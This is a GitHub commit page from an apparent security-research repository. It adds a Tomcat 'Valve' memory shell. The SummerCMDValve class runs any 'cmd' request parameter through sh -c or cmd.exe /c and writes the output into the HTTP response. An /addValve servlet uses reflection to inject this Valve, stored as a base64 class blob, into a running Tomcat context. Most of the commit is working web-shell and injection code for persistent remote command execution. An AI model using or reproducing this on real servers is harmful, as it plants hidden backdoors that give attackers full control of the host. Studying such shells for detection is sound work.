Skip to content

Commit

Permalink
✨ Tomcat Valve 内存马
Browse files Browse the repository at this point in the history
  • Loading branch information
@233Official
233Official committed Oct 23, 2024
1 parent 7097746 commit 0e5a575
Show file tree
Hide file tree
Showing 6 changed files with 127 additions and 4 deletions.
4 changes: 2 additions & 2 deletions Java/CommonUse/Encode/Base64/Base64ToClassFile/Base64ToClassFile.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,9 +20,9 @@ public static void DecodeBase64ToClassFile(String base64ClassString, String clas


public static void main(String[] args) {
String base64ClassString = "yv66vgAAADQAKwoABgAbCwAcAB0IAB4KAB8AIAcAIQcAIgcAIwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAwTG9yZy9zdTE4L21lbXNoZWxsL3NwcmluZy9vdGhlci9UZXN0SW50ZXJjZXB0b3I7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAKRXhjZXB0aW9ucwcAJAEAClNvdXJjZUZpbGUBABRUZXN0SW50ZXJjZXB0b3IuamF2YQwACAAJBwAlDAAmACcBABBpJ20gaW50ZXJjZXB0b3J+BwAoDAApACoBAC5vcmcvc3UxOC9tZW1zaGVsbC9zcHJpbmcvb3RoZXIvVGVzdEludGVyY2VwdG9yAQAQamF2YS9sYW5nL09iamVjdAEAMm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlckludGVyY2VwdG9yAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgAhAAUABgABAAcAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAACwAMAAAADAABAAAABQANAA4AAAABAA8AEAACAAoAAABZAAIABAAAAA0suQACAQASA7YABASsAAAAAgALAAAACgACAAAADwALABAADAAAACoABAAAAA0ADQAOAAAAAAANABEAEgABAAAADQATABQAAgAAAA0AFQAWAAMAFwAAAAQAAQAYAAEAGQAAAAIAGg==";
String base64ClassString = "yv66vgAAADQAMQoACAAbCgAcAB0IAB4KAB8AIAoABwAhCwAiACMHACQHACUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAKUxvcmcvc3UxOC9tZW1zaGVsbC90ZXN0L3RvbWNhdC9UZXN0VmFsdmU7AQAGaW52b2tlAQBSKExvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXF1ZXN0O0xvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTspVgEAB3JlcXVlc3QBACdMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdDsBAAhyZXNwb25zZQEAKExvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTsBAApFeGNlcHRpb25zBwAmBwAnAQAKU291cmNlRmlsZQEADlRlc3RWYWx2ZS5qYXZhDAAJAAoHACgMACkAKgEAEkkgY29tZSBoZXJlIGZpcnN0IQcAKwwALAAtDAAuAC8HADAMABAAEQEAJ29yZy9zdTE4L21lbXNoZWxsL3Rlc3QvdG9tY2F0L1Rlc3RWYWx2ZQEAJG9yZy9hcGFjaGUvY2F0YWxpbmEvdmFsdmVzL1ZhbHZlQmFzZQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BACZvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZQEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAdnZXROZXh0AQAdKClMb3JnL2FwYWNoZS9jYXRhbGluYS9WYWx2ZTsBABlvcmcvYXBhY2hlL2NhdGFsaW5hL1ZhbHZlACEABwAIAAAAAAACAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAADQANAAAADAABAAAABQAOAA8AAAABABAAEQACAAsAAABbAAMAAwAAABUstgACEgO2AAQqtgAFKyy5AAYDALEAAAACAAwAAAAOAAMAAAARAAkAEwAUABQADQAAACAAAwAAABUADgAPAAAAAAAVABIAEwABAAAAFQAUABUAAgAWAAAABgACABcAGAABABkAAAACABo=";
// String classFileName = "DecodedlassFile.class";
String classFileName = "su18SpringInterceptor.class";
String classFileName = "su18TomcatValve.class";
DecodeBase64ToClassFile(base64ClassString, classFileName);
}
}
2 changes: 1 addition & 1 deletion Java/CommonUse/Encode/Base64/ClassToBase64/ClassToBase64.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ public class ClassToBase64 {
public static void main(String[] args) {
try {
// 读取.class文件
File file = new File("resource/SummerInterceptorCMD.class");
File file = new File("resource/SummerCMDValve.class");
FileInputStream fis = new FileInputStream(file);
byte[] bytes = new byte[(int) file.length()];
fis.read(bytes);
Expand Down
8 changes: 7 additions & 1 deletion Security/Web/MemShell/Java/Tomcat/ServletAPI/TomcatServletAPIMemshell/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,13 @@
<!-- version-listener-0.3 尝试修改系统判断逻辑 -->
<!-- <version>listener-0.3</version> -->
<!-- version-listener-1.0 确定0.3版本的代码为可用代码,更新版本号为1.0 -->
<version>listener-1.0</version>
<!-- <version>listener-1.0</version> -->

<!-- Tomcat Valve 内存马 - 0.1 - su18 -->
<!-- <version>valve-0.1-su18-origin</version> -->
<!-- Tomcat Valve 内存马 - 0.2 - 注入恶意Valve -->
<version>valve-0.2-summer-cmd-valve</version>

<packaging>war</packaging>

<name>tomcat-servletapi-memshell Maven Webapp</name>
Expand Down
63 changes: 63 additions & 0 deletions ...omcat/ServletAPI/TomcatServletAPIMemshell/src/main/java/com/summer233/AddTomcatValve.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
package com.summer233;

import org.apache.catalina.Valve;
import org.apache.catalina.core.StandardContext;

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Field;

// import static com.summer233.DynamicUtils.VALVE_CLASS_STRING;
import static com.summer233.DynamicUtils.SUMMER_CMD_VALVE_CLASS_BASE64_STRING;

/**
* 访问这个 Servlet 将会动态添加自定义 Valve
* 测试版本 Tomcat 8.5.31
*
* @author su18,233
*/
@WebServlet(name = "AddTomcatValve", urlPatterns = "/addValve")
public class AddTomcatValve extends HttpServlet {

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

try {

// 从 request 中获取 servletContext
ServletContext servletContext = req.getServletContext();

// 如果已有此 servletName 的 Servlet,则不再重复添加
StandardContext o = null;

// 从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象
while (o == null) {
Field f = servletContext.getClass().getDeclaredField("context");
f.setAccessible(true);
Object object = f.get(servletContext);

if (object instanceof ServletContext) {
servletContext = (ServletContext) object;
} else if (object instanceof StandardContext) {
o = (StandardContext) object;
}
}

// 添加自定义 Valve
// o.addValve((Valve) DynamicUtils.getClass(VALVE_CLASS_STRING).newInstance());
o.addValve((Valve) DynamicUtils.getClass(SUMMER_CMD_VALVE_CLASS_BASE64_STRING).newInstance());

resp.getWriter().println("tomcat valve added");

} catch (Exception e) {
e.printStackTrace();
}

}

}
1 change: 1 addition & 0 deletions .../Tomcat/ServletAPI/TomcatServletAPIMemshell/src/main/java/com/summer233/DynamicUtils.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@

public class DynamicUtils {
public static String VALVE_CLASS_STRING = "yv66vgAAADQAMQoACAAbCgAcAB0IAB4KAB8AIAoABwAhCwAiACMHACQHACUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAKUxvcmcvc3UxOC9tZW1zaGVsbC90ZXN0L3RvbWNhdC9UZXN0VmFsdmU7AQAGaW52b2tlAQBSKExvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXF1ZXN0O0xvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTspVgEAB3JlcXVlc3QBACdMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdDsBAAhyZXNwb25zZQEAKExvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZTsBAApFeGNlcHRpb25zBwAmBwAnAQAKU291cmNlRmlsZQEADlRlc3RWYWx2ZS5qYXZhDAAJAAoHACgMACkAKgEAEkkgY29tZSBoZXJlIGZpcnN0IQcAKwwALAAtDAAuAC8HADAMABAAEQEAJ29yZy9zdTE4L21lbXNoZWxsL3Rlc3QvdG9tY2F0L1Rlc3RWYWx2ZQEAJG9yZy9hcGFjaGUvY2F0YWxpbmEvdmFsdmVzL1ZhbHZlQmFzZQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BACZvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZQEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAdnZXROZXh0AQAdKClMb3JnL2FwYWNoZS9jYXRhbGluYS9WYWx2ZTsBABlvcmcvYXBhY2hlL2NhdGFsaW5hL1ZhbHZlACEABwAIAAAAAAACAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAADQANAAAADAABAAAABQAOAA8AAAABABAAEQACAAsAAABbAAMAAwAAABUstgACEgO2AAQqtgAFKyy5AAYDALEAAAACAAwAAAAOAAMAAAARAAkAEwAUABQADQAAACAAAwAAABUADgAPAAAAAAAVABIAEwABAAAAFQAUABUAAgAWAAAABgACABcAGAABABkAAAACABo=";
public static String SUMMER_CMD_VALVE_CLASS_BASE64_STRING = "yv66vgAAAEEArgoAAgADBwAEDAAFAAYBACRvcmcvYXBhY2hlL2NhdGFsaW5hL3ZhbHZlcy9WYWx2ZUJhc2UBAAY8aW5pdD4BAAMoKVYIAAgBABh0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgKAAoACwcADAwADQAOAQAmb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2UBAA5zZXRDb250ZW50VHlwZQEAFShMamF2YS9sYW5nL1N0cmluZzspVggAEAEABVVURi04CgAKABIMABMADgEAFHNldENoYXJhY3RlckVuY29kaW5nCgAKABUMABYAFwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7CAAZAQAbSGVyZSBpcyBTdW1tZXJDTURWYWx2ZX48YnI+CgAbABwHAB0MAB4ADgEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAdwcmludGxuCAAgAQADY21kCgAiACMHACQMACUAJgEAJW9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1JlcXVlc3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwcAKAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgcAKgEAEGphdmEvbGFuZy9TdHJpbmcIACwBAAZ3aG9hbWkKACcALgwABQAvAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgoAJwAxDAAyADMBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwoANQA2BwA3DAA4ADkBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsHADsBABFqYXZhL3V0aWwvU2Nhbm5lcgoAOgA9DAAFAD4BABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYIAEABAAJcYQoAOgBCDABDAEQBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsKADoARgwARwBIAQAHaGFzTmV4dAEAAygpWgoAOgBKDABLAEwBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsIAE4BAAAIAFABAAFcCgApAFIMAFMAVAEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaCgA6AFYMAFcABgEABWNsb3NlBwBZAQATamF2YS9sYW5nL1Rocm93YWJsZQoAWABbDABcAF0BAA1hZGRTdXBwcmVzc2VkAQAYKExqYXZhL2xhbmcvVGhyb3dhYmxlOylWCABfAQACc2gIAGEBAAItYwgAYwEAB2NtZC5leGUIAGUBAAIvYwoAZwBoBwBpDABqAGsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsKAGcAbQwAbgBvAQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABsAcQwAcgAGAQAFZmx1c2gKABsAVgcAdQEAE2phdmEvbGFuZy9FeGNlcHRpb24KAHQAdwwAeAAGAQAPcHJpbnRTdGFja1RyYWNlCgB6AHsHAHwMAH0AfgEAHGNvbS9zdW1tZXIyMzMvU3VtbWVyQ01EVmFsdmUBAAdnZXROZXh0AQAdKClMb3JnL2FwYWNoZS9jYXRhbGluYS9WYWx2ZTsLAIAAgQcAggwAgwCEAQAZb3JnL2FwYWNoZS9jYXRhbGluYS9WYWx2ZQEABmludm9rZQEAUihMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdDtMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2U7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAHkxjb20vc3VtbWVyMjMzL1N1bW1lckNNRFZhbHZlOwEACG91dHB1dE9TAQASTGphdmEvbGFuZy9TdHJpbmc7AQAJc2Nhbm5lck9TAQATTGphdmEvdXRpbC9TY2FubmVyOwEADnJlc3BvbnNlV3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAGb3V0cHV0AQABcwEAB2lzTGludXgBAAFaAQAQcHJvY2Vzc0J1aWxkZXJPUwEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7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";

public static String BASIC_FILTER_CLASS_STRING_BASE64 = "yv66vgAAAEEANwoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCwAIAAkHAAoMAAsADAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsIAA4BABB0aGlzIGlzIGEgZmlsdGVyCgAQABEHABIMABMAFAEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWCwAWABcHABgMABkAGgEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAAhkb0ZpbHRlcgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYHABwBABljb20vc3VtbWVyMjMzL0Jhc2ljRmlsdGVyBwAeAQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAG0xjb20vc3VtbWVyMjMzL0Jhc2ljRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAA5zZXJ2bGV0UmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEAD3NlcnZsZXRSZXNwb25zZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAtmaWx0ZXJDaGFpbgEAG0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOwEACkV4Y2VwdGlvbnMHADEBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwAzAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBCYXNpY0ZpbHRlci5qYXZhACEAGwACAAEAHQAAAAQAAQAFAAYAAQAfAAAAMwABAAEAAAAFKrcAAbEAAAACACAAAAAKAAIAAAAMAAQADQAhAAAADAABAAAABQAiACMAAAABACQAJQABAB8AAAA1AAAAAgAAAAGxAAAAAgAgAAAABgABAAAAEQAhAAAAFgACAAAAAQAiACMAAAAAAAEAJgAnAAEAAQAZACgAAgAfAAAAZAADAAQAAAAULLkABwEAEg22AA8tKyy5ABUDALEAAAACACAAAAAOAAMAAAAWAAsAFwATABgAIQAAACoABAAAABQAIgAjAAAAAAAUACkAKgABAAAAFAArACwAAgAAABQALQAuAAMALwAAAAYAAgAwADIAAQA0AAYAAQAfAAAAKwAAAAEAAAABsQAAAAIAIAAAAAYAAQAAABwAIQAAAAwAAQAAAAEAIgAjAAAAAQA1AAAAAgA2";
public static String BASIC_SEVLET_CLASS_STRING_BASE64 = "yv66vgAAAEEANAoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCwAIAAkHAAoMAAsADAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsIAA4BABV0aGlzIGlzIGEgbmV3IFNlcnZsZXQKABAAEQcAEgwAEwAUAQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYHABYBACBjb20vc3VtbWVyMjMzL1N1bW1lckJhc2ljU2VydmxldAcAGAEAFWphdmF4L3NlcnZsZXQvU2VydmxldAEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAiTGNvbS9zdW1tZXIyMzMvU3VtbWVyQmFzaWNTZXJ2bGV0OwEABGluaXQBACAoTGphdmF4L3NlcnZsZXQvU2VydmxldENvbmZpZzspVgEADXNlcnZsZXRDb25maWcBAB1MamF2YXgvc2VydmxldC9TZXJ2bGV0Q29uZmlnOwEACkV4Y2VwdGlvbnMHACQBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABBnZXRTZXJ2bGV0Q29uZmlnAQAfKClMamF2YXgvc2VydmxldC9TZXJ2bGV0Q29uZmlnOwEAB3NlcnZpY2UBAEAoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOylWAQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7BwAuAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADmdldFNlcnZsZXRJbmZvAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAdkZXN0cm95AQAKU291cmNlRmlsZQEAF1N1bW1lckJhc2ljU2VydmxldC5qYXZhACEAFQACAAEAFwAAAAYAAQAFAAYAAQAZAAAAMwABAAEAAAAFKrcAAbEAAAACABoAAAAKAAIAAAALAAQADAAbAAAADAABAAAABQAcAB0AAAABAB4AHwACABkAAAA1AAAAAgAAAAGxAAAAAgAaAAAABgABAAAAEAAbAAAAFgACAAAAAQAcAB0AAAAAAAEAIAAhAAEAIgAAAAQAAQAjAAEAJQAmAAEAGQAAACwAAQABAAAAAgGwAAAAAgAaAAAABgABAAAAFAAbAAAADAABAAAAAgAcAB0AAAABACcAKAACABkAAABOAAIAAwAAAAwsuQAHAQASDbYAD7EAAAACABoAAAAKAAIAAAAZAAsAHAAbAAAAIAADAAAADAAcAB0AAAAAAAwAKQAqAAEAAAAMACsALAACACIAAAAGAAIAIwAtAAEALwAwAAEAGQAAACwAAQABAAAAAgGwAAAAAgAaAAAABgABAAAAIAAbAAAADAABAAAAAgAcAB0AAAABADEABgABABkAAAArAAAAAQAAAAGxAAAAAgAaAAAABgABAAAAJQAbAAAADAABAAAAAQAcAB0AAAABADIAAAACADM=";
Expand Down
53 changes: 53 additions & 0 deletions ...omcat/ServletAPI/TomcatServletAPIMemshell/src/main/java/com/summer233/SummerCMDValve.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
package com.summer233;

import java.io.IOException;
import javax.servlet.ServletException;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;
import org.apache.catalina.valves.ValveBase;

import java.io.InputStream;
import java.io.PrintWriter;
import java.util.Scanner;

public class SummerCMDValve extends ValveBase {
public SummerCMDValve() {
}

public void invoke(Request request, Response response) throws IOException, ServletException {
try {
response.setContentType("text/html; charset=UTF-8");
response.setCharacterEncoding("UTF-8");
response.getWriter().println("Here is SummerCMDValve~<br>");

String cmd = request.getParameter("cmd");
if (cmd != null) {
boolean isLinux = true;
ProcessBuilder processBuilderOS = new ProcessBuilder("whoami");
Process processOS = processBuilderOS.start();
InputStream inOS = processOS.getInputStream();
try (Scanner scannerOS = new Scanner(inOS).useDelimiter("\\a")) {
String outputOS = scannerOS.hasNext() ? scannerOS.next() : "";
// 如果输出中包含 \ 则说明是Windows, 毕竟 Linux 用户没有域名, Windows 的 whoami 输出是 域名\用户名
if (outputOS.contains("\\")) {
isLinux = false;
}
}
String[] cmds = isLinux ? new String[] { "sh", "-c", cmd }
: new String[] { "cmd.exe", "/c", cmd };
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
try (Scanner s = new Scanner(in).useDelimiter("\\a")) {
String output = s.hasNext() ? s.next() : "";
try (PrintWriter responseWriter = response.getWriter()) {
responseWriter.println(output);
responseWriter.flush();
}
}
}
} catch (Exception var5) {
var5.printStackTrace();
}

this.getNext().invoke(request, response);
}
}

0 comments on commit 0e5a575

Please sign in to comment.